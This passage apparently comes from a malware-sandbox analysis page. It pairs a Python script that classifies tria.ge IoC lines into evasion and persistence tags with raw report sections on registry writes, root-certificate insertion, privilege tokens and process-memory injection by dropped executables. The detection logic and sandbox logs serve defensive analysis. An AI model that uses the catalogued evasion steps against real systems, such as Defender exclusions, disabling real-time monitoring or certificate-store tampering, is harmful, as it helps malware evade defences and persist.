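EXCLUSION_RE = re.compile(r"\\Windows Defender\\Exclusions\\(Paths|Processes)\\(.+)$", re.I)
# Core Windows process names; a dropped file with one of these names outside System32 is masquerading.
SYSTEM_NAMES = {"csrss.exe", "lsass.exe", "smss.exe", "svchost.exe", "winlogon.exe", "services.exe"}


def parse_ioc(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Split one tria.ge IoC string into action, target, value (None if absent) and process."""
    m = IOC_RE.match(line.strip())
    if not m:
        return None
    value = m.group("value")
    return {
        "action": m.group("action"),
        "target": m.group("target"),
        "value": value.strip('"') if value is not None else None,
        "process": m.group("process"),
    }


def classify(ev: Dict[str, Optional[str]]) -> List[str]:
    """Map one parsed event to the behaviour tags it evidences (tag names are this example's own)."""
    tags: List[str] = []
    target, value, action = ev["target"], ev["value"], ev["action"]
    low = target.lower()
    if action.startswith("Set value"):
        if low.endswith("\\real-time protection\\disablerealtimemonitoring") and value == "1":
            tags.append("defender-realtime-disabled")
        if EXCLUSION_RE.search(target):
            tags.append("defender-exclusion")
        if low.endswith("\\policies\\system\\enablelua") and value == "0":
            tags.append("uac-disabled")
        if "\\currentversion\\run\\" in low:
            tags.append("run-key-persistence")
    if action == "File created":
        if "\\start menu\\programs\\startup\\" in low:
            tags.append("startup-folder-persistence")
        if low.rsplit("\\", 1)[-1] in SYSTEM_NAMES and "\\windows\\system32\\" not in low:
            tags.append("system-name-masquerade")
    if low.endswith(("\\systembiosversion", "\\systemproductname")) or "vboxminirdrdn" in low:
        tags.append("anti-vm-check")
    if low.endswith("\\geo\\nation"):
        tags.append("geofence-check")
    return tags


def excluded_items(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Defender exclusions actually written (Set value), as (kind, item, hive).
    Entries under Wow6432Node are what a 32-bit writer produces under WOW64 registry redirection."""
    out: List[Tuple[str, str, str]] = []
    for line in lines:
        ev = parse_ioc(line)
        if ev and ev["action"].startswith("Set value"):
            m = EXCLUSION_RE.search(ev["target"])
            if m:
                hive = "wow6432node" if "wow6432node" in ev["target"].lower() else "native"
                out.append((m.group(1), m.group(2), hive))
    return out


def summarize(lines: List[str]) -> Dict[str, list]:
    """Group (process, target) pairs by tag; lines the regex cannot parse land under 'unparsed'."""
    summary: Dict[str, list] = defaultdict(list)
    for line in lines:
        ev = parse_ioc(line)
        if ev is None:
            summary["unparsed"].append(line)
            continue
        for tag in classify(ev):
            summary[tag].append((ev["process"], ev["target"]))
    return dict(summary)


if __name__ == "__main__":
    for tag, hits in sorted(summarize(SAMPLE_IOCS).items()):
        print(f"{tag} ({len(hits)})")
        for process, target in hits:
            print(f"    {process}: {target}")
    for kind, item, hive in excluded_items(SAMPLE_IOCS):
        print(f"exclusion {kind}/{hive}: {item}")
```

The hive split in excluded_items is the caveat worth carrying into a write-up: the 64-bit Defender service reads the native Windows Defender key, so an exclusion that only landed under Wow6432Node because a 32-bit reg.exe or cmd.exe was redirected there does not take effect, while the native-hive entries for C:\Windows\rss, C:\Windows\System32\drivers and the csrss.exe/windefender.exe process names do. The Key created lines deliberately produce no tag, since creating the Exclusions\Paths key on its own excludes nothing.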
Modifies data under HKEY_USERS 64 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" windefender.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{485A3935-D4FD-466B-AB56-D74DE02075F9}\da-84-01-ce-37-86 JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time" windefender.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing JUNRlIz.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" windefender.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" windefender.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" windefender.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{485A3935-D4FD-466B-AB56-D74DE02075F9}\WpadDecisionReason = "1" JUNRlIz.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{485A3935-D4FD-466B-AB56-D74DE02075F9}\WpadNetworkName = "Network 3" JUNRlIz.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" windefender.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" Ahzn2Szwr26hfrPXyZRPFZkG.exe
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912e
d06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 
1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e
26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 patch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid   Process
2024  conhost.exe
544   conhost.exe
540   cmd.exe
1520  Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520  Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520  Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520  Ahzn2Szwr26hfrPXyZRPFZkG.exe
1520  Ahzn2Szwr26hfrPXyZRPFZkG.exe
884   lhuGc8cD8YBgMslw3CZs4Nqs.exe
884   lhuGc8cD8YBgMslw3CZs4Nqs.exe
884   lhuGc8cD8YBgMslw3CZs4Nqs.exe
884   lhuGc8cD8YBgMslw3CZs4Nqs.exe
884   lhuGc8cD8YBgMslw3CZs4Nqs.exe
2596  injector.exe
2596  injector.exe
1988  powershell.EXE
2596  injector.exe
1988  powershell.EXE
1988  powershell.EXE
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
452   powershell.EXE
452   powershell.EXE
452   powershell.EXE
2596  injector.exe
2596  injector.exe
2156  csrss.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
2156  csrss.exe
2596  injector.exe
2156  csrss.exe
2596  injector.exe
2596  injector.exe
2596  injector.exe
Suspicious use of AdjustPrivilegeToken 13 IoCs
description                            pid   Process
Token: SeDebugPrivilege                1800  CasPol.exe
Token: SeDebugPrivilege                2024  conhost.exe
Token: SeDebugPrivilege                544   conhost.exe
Token: SeImpersonatePrivilege          544   conhost.exe
Token: SeDebugPrivilege                540   cmd.exe
Token: SeImpersonatePrivilege          540   cmd.exe
Token: SeSystemEnvironmentPrivilege    2156  csrss.exe
Token: SeDebugPrivilege                1988  powershell.EXE
Token: SeDebugPrivilege                452   powershell.EXE
Token: SeSecurityPrivilege             700   conhost.exe
Token: SeSecurityPrivilege             700   conhost.exe
Token: SeDebugPrivilege                3056  conhost.exe
Token: SeDebugPrivilege                1672  powershell.EXE
Suspicious use of FindShellTrayWindow 1 IoCs
pid   Process
700   conhost.exe
Suspicious use of WriteProcessMemory 64 IoCs
description                          pid   Process                         procid_target
PID 700 wrote to memory of 2024      700   conhost.exe                     186
PID 700 wrote to memory of 2024      700   conhost.exe                     186
PID 700 wrote to memory of 2024      700   conhost.exe                     186
PID 700 wrote to memory of 2024      700   conhost.exe                     186
PID 700 wrote to memory of 1800      700   conhost.exe                     30
PID 700 wrote to memory of 1800      700   conhost.exe                     30
PID 700 wrote to memory of 1800      700   conhost.exe                     30
PID 700 wrote to memory of 1800      700   conhost.exe                     30
PID 700 wrote to memory of 1800      700   conhost.exe                     30
PID 700 wrote to memory of 1800      700   conhost.exe                     30
PID 700 wrote to memory of 1800      700   conhost.exe                     30
PID 700 wrote to memory of 1800      700   conhost.exe                     30
PID 700 wrote to memory of 1800      700   conhost.exe                     30
PID 1800 wrote to memory of 540      1800  CasPol.exe                      226
PID 1800 wrote to memory of 540      1800  CasPol.exe                      226
PID 1800 wrote to memory of 540      1800  CasPol.exe                      226
PID 1800 wrote to memory of 540      1800  CasPol.exe                      226
PID 1800 wrote to memory of 544      1800  CasPol.exe                      270
PID 1800 wrote to memory of 544      1800  CasPol.exe                      270
PID 1800 wrote to memory of 544      1800  CasPol.exe                      270
PID 1800 wrote to memory of 544      1800  CasPol.exe                      270
PID 1800 wrote to memory of 1872     1800  CasPol.exe                      34
PID 1800 wrote to memory of 1872     1800  CasPol.exe                      34
PID 1800 wrote to memory of 1872     1800  CasPol.exe                      34
PID 1800 wrote to memory of 1872     1800  CasPol.exe                      34
PID 1800 wrote to memory of 1872     1800  CasPol.exe                      34
PID 1800 wrote to memory of 1872     1800  CasPol.exe                      34
PID 1800 wrote to memory of 1872     1800  CasPol.exe                      34
PID 1800 wrote to memory of 2956     1800  CasPol.exe                      71
PID 1800 wrote to memory of 2956     1800  CasPol.exe                      71
PID 1800 wrote to memory of 2956     1800  CasPol.exe                      71
PID 1800 wrote to memory of 2956     1800  CasPol.exe                      71
PID 1800 wrote to memory of 2956     1800  CasPol.exe                      71
PID 1800 wrote to memory of 2956     1800  CasPol.exe                      71
PID 1800 wrote to memory of 2956     1800  CasPol.exe                      71
PID 1800 wrote to memory of 2340     1800  CasPol.exe                      39
PID 1800 wrote to memory of 2340     1800  CasPol.exe                      39
PID 1800 wrote to memory of 2340     1800  CasPol.exe                      39
PID 1800 wrote to memory of 2340     1800  CasPol.exe                      39
PID 1800 wrote to memory of 2340     1800  CasPol.exe                      39
PID 1800 wrote to memory of 2340     1800  CasPol.exe                      39
PID 1800 wrote to memory of 2340     1800  CasPol.exe                      39
PID 2340 wrote to memory of 700      2340  Fku5AId0LuZ4E8yzod75BtEi.exe    272
PID 2340 wrote to memory of 700      2340  Fku5AId0LuZ4E8yzod75BtEi.exe    272
PID 2340 wrote to memory of 700      2340  Fku5AId0LuZ4E8yzod75BtEi.exe    272
PID 2340 wrote to memory of 700      2340  Fku5AId0LuZ4E8yzod75BtEi.exe    272
PID 2340 wrote to memory of 700      2340  Fku5AId0LuZ4E8yzod75BtEi.exe    272
PID 2340 wrote to memory of 700      2340  Fku5AId0LuZ4E8yzod75BtEi.exe    272
PID 2340 wrote to memory of 700      2340  Fku5AId0LuZ4E8yzod75BtEi.exe    272
PID 2956 wrote to memory of 2960     2956  Btpmb8l6OLnsIVBHYXzcfv46.exe    41
PID 2956 wrote to memory of 2960     2956  Btpmb8l6OLnsIVBHYXzcfv46.exe    41
PID 2956 wrote to memory of 2960     2956  Btpmb8l6OLnsIVBHYXzcfv46.exe    41
PID 2956 wrote to memory of 2960     2956  Btpmb8l6OLnsIVBHYXzcfv46.exe    41
PID 2956 wrote to memory of 2960     2956  Btpmb8l6OLnsIVBHYXzcfv46.exe    41
PID 2956 wrote to memory of 2960     2956  Btpmb8l6OLnsIVBHYXzcfv46.exe    41
PID 2956 wrote to memory of 2960     2956  Btpmb8l6OLnsIVBHYXzcfv46.exe    41
PID 1520 wrote to memory of 1256     1520  Ahzn2Szwr26hfrPXyZRPFZkG.exe    47
PID 1520 wrote to memory of 1256     1520  Ahzn2Szwr26hfrPXyZRPFZkG.exe    47
PID 1520 wrote to memory of 1256     1520  Ahzn2Szwr26hfrPXyZRPFZkG.exe    47
PID 1520 wrote to memory of 1256     1520  Ahzn2Szwr26hfrPXyZRPFZkG.exe    47
PID 1256 wrote to memory of 2844     1256  cmd.exe                         43
PID 1256 wrote to memory of 2844     1256  cmd.exe                         43
PID 1256 wrote to memory of 2844     1256  cmd.exe                         43
PID 884 wrote to memory of 2840      884   lhuGc8cD8YBgMslw3CZs4Nqs.exe    45
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe"C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe"1⤵
- Windows security bypass
- Windows security modification
PID:700 -
